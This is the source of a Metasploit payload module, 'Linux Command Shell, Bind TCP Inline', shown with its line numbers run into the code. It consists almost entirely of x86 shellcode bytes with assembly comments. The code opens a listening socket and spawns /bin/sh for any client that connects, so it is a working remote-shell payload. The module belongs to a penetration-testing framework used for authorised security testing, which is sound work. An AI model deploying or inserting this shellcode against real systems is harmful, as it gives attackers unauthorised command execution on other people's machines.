Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/payloads/singles/linux/x86/shell_bind_tcp.rb
Views: 11782
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456module MetasploitModule78CachedSize = 78910include Msf::Payload::Single11include Msf::Payload::Linux12include Msf::Sessions::CommandShellOptions1314def initialize(info = {})15super(merge_info(info,16'Name' => 'Linux Command Shell, Bind TCP Inline',17'Description' => 'Listen for a connection and spawn a command shell',18'Author' => 'Ramon de C Valle',19'License' => MSF_LICENSE,20'Platform' => 'linux',21'Arch' => ARCH_X86,22'Handler' => Msf::Handler::BindTcp,23'Session' => Msf::Sessions::CommandShellUnix,24'Payload' =>25{26'Offsets' =>27{28'LPORT' => [ 21, 'n' ],29},30# TODO: Payload source needs serious cleanup. This payload was31# originally generated from32# external/source/unixasm/lin-x86-bndsockcode.s which supposedly33# worked when it was initially committed. Nevertheless, it was34# calling bind(2) with insane parameters, which ended up erroring out35# and causing execution to fall off the end of the shellcode,36# bursting into flames. See #7216, #722437'Payload' =>38"\x31\xdb" + # xorl %ebx,%ebx #39"\xf7\xe3" + # mull %ebx #40"\x53" + # pushl %ebx #41"\x43" + # incl %ebx #42"\x53" + # pushl %ebx #43"\x6a\x02" + # pushl $0x02 #44"\x89\xe1" + # movl %esp,%ecx #45"\xb0\x66" + # movb $0x66,%al #46"\xcd\x80" + # int $0x80 #47"\x5b" + # popl %ebx #48"\x5e" + # popl %esi #49"\x52" + # pushl %edx #50"\x68\x02\x00\x04\xd2" + # pushl $0xd2040200 #51"\x6a\x10" + # pushl $0x10 #52"\x51" + # pushl %ecx #53"\x50" + # pushl %eax #54"\x89\xe1" + # movl %esp,%ecx #55"\x6a\x66" + # pushl $0x66 #56"\x58" + # popl %eax #57"\xcd\x80" + # int $0x80 #58"\x89\x41\x04" + # movl %eax,0x04(%ecx) #59"\xb3\x04" + # movb $0x04,%bl #60"\xb0\x66" + # movb $0x66,%al #61"\xcd\x80" + # int $0x80 #62"\x43" + # incl %ebx #63"\xb0\x66" + # movb $0x66,%al #64"\xcd\x80" + # int $0x80 #65"\x93" + # xchgl %eax,%ebx #66"\x59" + # popl %ecx #67"\x6a\x3f" + # pushl $0x3f #68"\x58" + # popl %eax #69"\xcd\x80" + # int $0x80 #70"\x49" + # decl %ecx #71"\x79\xf8" + # jns <bndsockcode+50> #72"\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f #73"\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f #74"\x89\xe3" + # movl %esp,%ebx #75"\x50" + # pushl %eax #76"\x53" + # pushl %ebx #77"\x89\xe1" + # movl %esp,%ecx #78"\xb0\x0b" + # movb $0x0b,%al #79"\xcd\x80" # int $0x80 #80}81))82end83end848586